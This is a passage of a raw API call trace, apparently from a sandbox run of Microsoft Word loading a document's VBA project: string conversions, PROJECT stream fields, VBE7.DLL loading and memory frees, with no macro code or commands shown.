lpUsedDefaultChar=0x0) returned 6 [0232.301] CLSIDFromString (in: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", pclsid=0x33e4fb0b40 | out: pclsid=0x33e4fb0b40*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52))) returned 0x0 [0232.301] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39e14e8b0 [0232.301] _ultow_s (in: _Value=0x2, _Buffer=0x33e4fb09ca, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0232.301] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb09ce, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0232.301] _ultow_s (in: _Value=0x0, _Buffer=0x33e4fb09d2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0232.301] wcscpy_s (in: _Destination=0x1d39d9ec5d8, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0232.301] wcscpy_s (in: _Destination=0x1d39d9ec5de, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0232.301] wcscpy_s (in: _Destination=0x1d39d9ec62a, _SizeInWords=0x6c, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0232.301] wcscpy_s (in: _Destination=0x1d39d9ec638, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0232.301] wcscpy_s (in: _Destination=0x1d39d9ec6b8, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0232.301] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39e14e8b0) [0232.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.0#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=148, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 148 [0232.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.0#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=148, lpMultiByteStr=0x33e4fb0720, cbMultiByte=148, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.0#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object LibraryÓ\x01", lpUsedDefaultChar=0x0) returned 148 [0232.301] IUnknown:Release (This=0x1d3985c5700) returned 0x6 [0232.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0232.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=12, lpMultiByteStr=0x33e4fb07c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument3", lpUsedDefaultChar=0x0) returned 12 [0232.302] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9ca6c0) [0232.302] wcscpy_s (in: _Destination=0x33e4fb0c70, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0232.302] _ltow_s (in: _Value=0, _Buffer=0x33e4fb0c7c, _BufferCount=0x3a, _Radix=16 | out: _Buffer="0") returned 0x0 [0232.302] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x420) returned 0x1d39d9c9e20 [0232.302] SysStringLen (param_1="*\\CNormal") returned 0x9 [0232.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\CNormal", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0232.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\CNormal", cchWideChar=9, lpMultiByteStr=0x33e4fb0840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\CNormalQ\x02¢Ó\x01", lpUsedDefaultChar=0x0) returned 9 [0232.304] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9c9e20) [0232.304] wcscpy_s (in: _Destination=0x33e4fb0c20, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0232.304] _ltow_s (in: _Value=1, _Buffer=0x33e4fb0c2c, _BufferCount=0x3a, _Radix=16 | out: _Buffer="1") returned 0x0 [0232.304] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x420) returned 0x1d39d9c9580 [0232.307] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9c9580) [0232.307] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39df59da0) [0232.307] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d743dc0) [0232.307] lstrlenA (lpString="ThisDocument") returned 12 [0232.307] lstrlenA (lpString="ThisDocument") returned 12 [0232.308] malloc (_Size=0x168) returned 0x1d39bdee3a0 [0232.308] malloc (_Size=0x20) returned 0x1d39bde6cc0 [0232.308] lstrcpyA (in: lpString1=0x1d39bdee3ec, lpString2="PROJECT" | out: lpString1="PROJECT") returned="PROJECT" [0232.308] wsprintfA (in: param_1=0x33e4fb0ba0, param_2="%s=\"" | out: param_1="ID=\"") returned 4 [0232.308] lstrcatA (in: lpString1="ID=\"", lpString2="{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}" | out: lpString1="ID=\"{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}") returned="ID=\"{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}" [0232.308] lstrcatA (in: lpString1="ID=\"{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}", lpString2="\"\r\n" | out: lpString1="ID=\"{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}\"\r\n") returned="ID=\"{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}\"\r\n" [0232.308] lstrlenA (lpString="ID=\"{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}\"\r\n") returned 45 [0232.308] wsprintfA (in: param_1=0x33e4fb01d0, param_2="%s=" | out: param_1="Document=") returned 9 [0232.308] lstrlenA (lpString="Document=") returned 9 [0232.308] lstrlenA (lpString="ThisDocument") returned 12 [0232.308] lstrlenA (lpString="ThisDocument") returned 12 [0232.308] wsprintfA (in: param_1=0x33e4fb01e5, param_2="/&H%08lX\r\n" | out: param_1="/&H00000000\r\n") returned 13 [0232.308] lstrlenA (lpString="Document=ThisDocument/&H00000000\r\n") returned 34 [0232.308] wsprintfA (in: param_1=0x33e4fb0ba0, param_2="%s=\"" | out: param_1="Name=\"") returned 6 [0232.308] lstrlenA (lpString="Name=\"") returned 6 [0232.308] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0232.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0232.308] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0232.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=8, lpWideCharStr=0x1d3a4286548, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0232.309] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x33e4fb0ba6, cbMultiByte=2039, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0232.309] lstrlenA (lpString="Project") returned 7 [0232.309] lstrcatA (in: lpString1="Project", lpString2="\"\r\n" | out: lpString1="Project\"\r\n") returned="Project\"\r\n" [0232.309] lstrlenA (lpString="Name=\"Project\"\r\n") returned 16 [0232.309] wsprintfA (in: param_1=0x33e4fb0ba0, param_2="%s=\"%d\"\r\n" | out: param_1="HelpContextID=\"0\"\r\n") returned 19 [0232.309] lstrlenA (lpString="HelpContextID=\"0\"\r\n") returned 19 [0232.309] wsprintfA (in: param_1=0x33e4fb0ba0, param_2="%s=\"%u\"\r\n" | out: param_1="VersionCompatible32=\"393222000\"\r\n") returned 33 [0232.309] lstrlenA (lpString="VersionCompatible32=\"393222000\"\r\n") returned 33 [0232.309] wsprintfA (in: param_1=0x33e4fb02e0, param_2="%s=\"" | out: param_1="CMG=\"") returned 5 [0232.309] GetTickCount () returned 0x117b808 [0232.309] malloc (_Size=0x17) returned 0x1d39bde9130 [0232.309] lstrlenA (lpString="{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}") returned 38 [0232.309] lstrcatA (in: lpString1="CMG=\"", lpString2="080A585E5C5E5C5E5C5E5C" | out: lpString1="CMG=\"080A585E5C5E5C5E5C5E5C") returned="CMG=\"080A585E5C5E5C5E5C5E5C" [0232.309] lstrcatA (in: lpString1="CMG=\"080A585E5C5E5C5E5C5E5C", lpString2="\"\r\n" | out: lpString1="CMG=\"080A585E5C5E5C5E5C5E5C\"\r\n") returned="CMG=\"080A585E5C5E5C5E5C5E5C\"\r\n" [0232.309] lstrlenA (lpString="CMG=\"080A585E5C5E5C5E5C5E5C\"\r\n") returned 30 [0232.309] free (_Block=0x1d39bde9130) [0232.309] wsprintfA (in: param_1=0x33e4fb02e0, param_2="%s=\"" | out: param_1="DPB=\"") returned 5 [0232.309] lstrlenA (lpString="") returned 0 [0232.309] GetTickCount () returned 0x117b808 [0232.309] malloc (_Size=0x11) returned 0x1d39bde8f70 [0232.309] lstrlenA (lpString="{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}") returned 38 [0232.309] lstrcatA (in: lpString1="DPB=\"", lpString2="1012406341634163" | out: lpString1="DPB=\"1012406341634163") returned="DPB=\"1012406341634163" [0232.309] lstrcatA (in: lpString1="DPB=\"1012406341634163", lpString2="\"\r\n" | out: lpString1="DPB=\"1012406341634163\"\r\n") returned="DPB=\"1012406341634163\"\r\n" [0232.309] lstrlenA (lpString="DPB=\"1012406341634163\"\r\n") returned 24 [0232.309] free (_Block=0x1d39bde8f70) [0232.309] wsprintfA (in: param_1=0x33e4fb02e0, param_2="%s=\"" | out: param_1="GC=\"") returned 4 [0232.309] GetTickCount () returned 0x117b808 [0232.309] malloc (_Size=0x11) returned 0x1d39bde9050 [0232.309] lstrlenA (lpString="{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}") returned 38 [0232.310] lstrcatA (in: lpString1="GC=\"", lpString2="181A486B496B4994" | out: lpString1="GC=\"181A486B496B4994") returned="GC=\"181A486B496B4994" [0232.310] lstrcatA (in: lpString1="GC=\"181A486B496B4994", lpString2="\"\r\n" | out: lpString1="GC=\"181A486B496B4994\"\r\n") returned="GC=\"181A486B496B4994\"\r\n" [0232.310] lstrlenA (lpString="GC=\"181A486B496B4994\"\r\n") returned 23 [0232.310] free (_Block=0x1d39bde9050) [0232.310] wsprintfA (in: param_1=0x33e4fb09d0, param_2="\r\n[%s]\r\n" | out: param_1="\r\n[Host Extender Info]\r\n") returned 24 [0232.310] lstrlenA (lpString="\r\n[Host Extender Info]\r\n") returned 24 [0232.310] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0232.310] malloc (_Size=0x138) returned 0x1d39bdee510 [0232.310] wsprintfA (in: param_1=0x1d39bdee510, param_2="%s=%s\r\n" | out: param_1="&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000\r\n") returned 66 [0232.310] lstrlenA (lpString="&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000\r\n") returned 66 [0232.310] free (_Block=0x1d39bdee510) [0232.310] wsprintfA (in: param_1=0x33e4fb09d0, param_2="\r\n[%s]\r\n" | out: param_1="\r\n[Workspace]\r\n") returned 15 [0232.310] lstrlenA (lpString="\r\n[Workspace]\r\n") returned 15 [0232.310] lstrlenA (lpString="25, 25, 787, 374, Z") returned 19 [0232.310] malloc (_Size=0x116) returned 0x1d39bdee510 [0232.310] wsprintfA (in: param_1=0x1d39bdee510, param_2="%s=%s\r\n" | out: param_1="ThisDocument=25, 25, 787, 374, Z\r\n") returned 34 [0232.310] lstrlenA (lpString="ThisDocument=25, 25, 787, 374, Z\r\n") returned 34 [0232.310] free (_Block=0x1d39bdee510) [0232.312] free (_Block=0x1d39bde6cc0) [0232.312] free (_Block=0x1d39bdee3a0) [0232.322] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0232.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0232.323] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0232.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=8, lpWideCharStr=0x1d3a4286548, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0232.323] free (_Block=0x1d39bdea000) [0232.323] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0232.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0232.323] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0232.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=8, lpWideCharStr=0x1d39e1bacc8, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0232.323] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x33e4fb0db0, cbMultiByte=2043, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0232.323] lstrlenA (lpString="Project") returned 7 [0232.323] lstrcatA (in: lpString1="Project", lpString2=" (" | out: lpString1="Project (") returned="Project (" [0232.323] strncat_s (in: _Destination="Project (", _SizeInBytes=0x902, _Source="1", _MaxCount=0x28 | out: _Destination="Project (1") returned 0x0 [0232.323] lstrcatA (in: lpString1="Project (1", lpString2=")" | out: lpString1="Project (1)") returned="Project (1)" [0232.323] _wfullpath (in: _Buffer=0x33e4fb15f0, _Path="C:\\Users\\FD1HVy\\Desktop\\1.doc", _BufferCount=0x104 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop\\1.doc") returned="C:\\Users\\FD1HVy\\Desktop\\1.doc" [0232.447] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0232.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0232.447] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0232.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=8, lpWideCharStr=0x1d39e1bacc8, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0232.447] free (_Block=0x1d39bdea120) [0232.447] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0232.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0232.447] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0232.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=8, lpWideCharStr=0x1d3a4286548, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0232.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x33e4fb1a20, cbMultiByte=2043, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0232.447] lstrlenA (lpString="Project") returned 7 [0232.447] lstrcatA (in: lpString1="Project", lpString2=" (" | out: lpString1="Project (") returned="Project (" [0232.447] strncat_s (in: _Destination="Project (", _SizeInBytes=0x902, _Source="1", _MaxCount=0x28 | out: _Destination="Project (1") returned 0x0 [0232.448] lstrcatA (in: lpString1="Project (1", lpString2=")" | out: lpString1="Project (1)") returned="Project (1)" [0232.448] SysStringByteLen (bstr="潎浲污") returned 0x6 [0232.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0232.449] SysStringByteLen (bstr="潎浲污") returned 0x6 [0232.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d39dc856e8, cbMultiByte=7, lpWideCharStr=0x1d3a4286548, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0232.751] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d999d80) [0232.751] IUnknown:Release (This=0x1d3980663b0) returned 0xa [0232.751] IUnknown:Release (This=0x1d3985c4c00) returned 0x28 [0232.751] IUnknown:Release (This=0x1d3980655f0) returned 0x8 [0232.751] IUnknown:Release (This=0x1d3985c5700) returned 0x5 [0232.751] SetErrorMode (uMode=0x8001) returned 0x8001 [0232.751] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0232.752] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7ffce0820000 [0232.755] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a300000ca2) returned 1 [0232.755] SetErrorMode (uMode=0x8001) returned 0x8001 [0232.756] GetProcAddress (hModule=0x7ffce0820000, lpProcName=0x2cc) returned 0x7ffce0b668d8 [0232.756] GetCurrentProcess () returned 0xffffffffffffffff [0232.756] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8b07ac, dwSize=0x4b) returned 1 [0232.756] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8b07ac, ImageBase=0x33e4fb9078, HistoryTable=0x33e4fb9080 | out: ImageBase=0x33e4fb9078, HistoryTable=0x33e4fb9080) returned 0x1d39d8b0804 [0232.756] GetCurrentProcess () returned 0xffffffffffffffff [0232.756] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8b1464, dwSize=0x4c) returned 1 [0232.756] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8b1464, ImageBase=0x33e4fb90d8, HistoryTable=0x33e4fb90e0 | out: ImageBase=0x33e4fb90d8, HistoryTable=0x33e4fb90e0) returned 0x1d39d8b14c0 [0232.756] GetCurrentProcess () returned 0xffffffffffffffff [0232.756] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8b1508, dwSize=0x5c) returned 1 [0232.756] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8b1508, ImageBase=0x33e4fb90d8, HistoryTable=0x33e4fb90e0 | out: ImageBase=0x33e4fb90d8, HistoryTable=0x33e4fb90e0) returned 0x1d39d8b1574 [0232.756] GetCurrentProcess () returned 0xffffffffffffffff [0232.756] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39dbc6b7c, dwSize=0x4c) returned 1 [0232.756] RtlLookupFunctionEntry (in: ControlPc=0x1d39dbc6b7c, ImageBase=0x33e4fb90d8, HistoryTable=0x33e4fb90e0 | out: ImageBase=0x33e4fb90d8, HistoryTable=0x33e4fb90e0) returned 0x1d39dbc6bd8 [0232.756] GetCurrentProcess () returned 0xffffffffffffffff [0232.756] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39dbc6c34, dwSize=0x4c) returned 1 [0232.756] RtlLookupFunctionEntry (in: ControlPc=0x1d39dbc6c34, ImageBase=0x33e4fb90d8, HistoryTable=0x33e4fb90e0 | out: ImageBase=0x33e4fb90d8, HistoryTable=0x33e4fb90e0) returned 0x1d39dbc6c90 [0232.756] SetErrorMode (uMode=0x8001) returned 0x8001 [0232.756] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0232.756] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7ffce0820000 [0232.757] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a300000ca3) returned 1 [0232.757] SetErrorMode (uMode=0x8001) returned 0x8001 [0232.757] GetProcAddress (hModule=0x7ffce0820000, lpProcName=0x260) returned 0x7ffce097098c [0232.757] GetCurrentProcess () returned 0xffffffffffffffff [0232.757] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39dbc5df4, dwSize=0x43) returned 1 [0232.757] RtlLookupFunctionEntry (in: ControlPc=0x1d39dbc5df4, ImageBase=0x33e4fb9078, HistoryTable=0x33e4fb9080 | out: ImageBase=0x33e4fb9078, HistoryTable=0x33e4fb9080) returned 0x1d39dbc5e44 [0232.758] SetErrorMode (uMode=0x8001) returned 0x8001 [0232.758] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0232.758] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7ffce0820000 [0232.759] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a300000ca4) returned 1 [0232.759] SetErrorMode (uMode=0x8001) returned 0x8001 [0232.759] GetProcAddress (hModule=0x7ffce0820000, lpProcName=0x2cc) returned 0x7ffce0b668d8 [0232.759] GetCurrentProcess () returned 0xffffffffffffffff [0232.759] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8b07ac, dwSize=0x4b) returned 1 [0232.759] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8b07ac, ImageBase=0x33e4fb9018, HistoryTable=0x33e4fb9020 | out: ImageBase=0x33e4fb9018, HistoryTable=0x33e4fb9020) returned 0x1d39d8b0804 [0232.759] GetCurrentProcess () returned 0xffffffffffffffff [0232.759] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8b1464, dwSize=0x4c) returned 1 [0232.759] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8b1464, ImageBase=0x33e4fb9078, HistoryTable=0x33e4fb9080 | out: ImageBase=0x33e4fb9078, HistoryTable=0x33e4fb9080) returned 0x1d39d8b14c0 [0232.759] GetCurrentProcess () returned 0xffffffffffffffff [0232.759] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39d8b1508, dwSize=0x5c) returned 1 [0232.759] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8b1508, ImageBase=0x33e4fb9078, HistoryTable=0x33e4fb9080 | out: ImageBase=0x33e4fb9078, HistoryTable=0x33e4fb9080) returned 0x1d39d8b1574 [0232.760] GetCurrentProcess () returned 0xffffffffffffffff [0232.760] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39dbc6b7c, dwSize=0x4c) returned 1 [0232.760] RtlLookupFunctionEntry (in: ControlPc=0x1d39dbc6b7c, ImageBase=0x33e4fb9078, HistoryTable=0x33e4fb9080 | out: ImageBase=0x33e4fb9078, HistoryTable=0x33e4fb9080) returned 0x1d39dbc6bd8 [0232.760] GetCurrentProcess () returned 0xffffffffffffffff [0232.760] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39dbc6c34, dwSize=0x4c) returned 1 [0232.760] RtlLookupFunctionEntry (in: ControlPc=0x1d39dbc6c34, ImageBase=0x33e4fb9078, HistoryTable=0x33e4fb9080 | out: ImageBase=0x33e4fb9078, HistoryTable=0x33e4fb9080) returned 0x1d39dbc6c90 [0232.760] SetErrorMode (uMode=0x8001) returned 0x8001 [0232.760] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0232.760] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x7ffce0820000 [0232.760] DeactivateActCtx (dwFlags=0x0, ulCookie=0x100212a300000ca5) returned 1 [0232.760] SetErrorMode (uMode=0x8001) returned 0x8001 [0232.761] GetProcAddress (hModule=0x7ffce0820000, lpProcName=0x260) returned 0x7ffce097098c [0232.761] GetCurrentProcess () returned 0xffffffffffffffff [0232.761] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1d39dbc5df4, dwSize=0x43) returned 1 [0232.761] RtlLookupFunctionEntry (in: ControlPc=0x1d39dbc5df4, ImageBase=0x33e4fb9018, HistoryTable=0x33e4fb9020 | out: ImageBase=0x33e4fb9018, HistoryTable=0x33e4fb9020) returned 0x1d39dbc5e44 [0232.761] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a8a20) [0232.761] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d44c8e0) [0232.762] SetCursor (hCursor=0x10007) returned 0x10003 [0232.762] free (_Block=0x1d39bde6ab0) [0232.762] free (_Block=0x1d39bde83e0) [0232.763] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0232.763] IUnknown:Release (This=0x1d39d55b180) returned 0x3 [0232.763] IUnknown:Release (This=0x1d39d55b1d8) returned 0x0 [0232.763] IUnknown:Release (This=0x1d39d552cd0) returned 0x2 [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7d32a0) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a3ff0) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a3830) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a2630) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a23f0) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a1e70) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7be290) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a01b0) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d7bee20) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a0bf0) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a0230) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d4a0670) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d3984b9eb0) [0232.763] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8af83c, ImageBase=0x33e4fb9870, HistoryTable=0x33e4fb9890 | out: ImageBase=0x33e4fb9870, HistoryTable=0x33e4fb9890) returned 0x0 [0232.763] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8b11fc, ImageBase=0x33e4fb9870, HistoryTable=0x33e4fb9890 | out: ImageBase=0x33e4fb9870, HistoryTable=0x33e4fb9890) returned 0x0 [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d826e30) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbbda40) [0232.763] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d5faee0) [0232.764] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbc0110) [0232.764] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbc2c30) [0232.764] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbc34d0) [0232.764] RtlLookupFunctionEntry (in: ControlPc=0x1d39d8b07ac, ImageBase=0x33e4fb9870, HistoryTable=0x33e4fb9890 | out: ImageBase=0x33e4fb9870, HistoryTable=0x33e4fb9890) returned 0x1d39d8b0804 [0232.764] RtlLookupFunctionEntry (in: ControlPc=0x1d39dbc5df4, ImageBase=0x33e4fb9870, HistoryTable=0x33e4fb9890 | out: ImageBase=0x33e4fb9870, HistoryTable=0x33e4fb9890) returned 0x1d39dbc5e44 [0232.764] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbc3080) [0232.764] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbc1f40) [0232.764] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbc1af0) [0232.764] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbbd5f0) [0232.764] IMalloc:Free 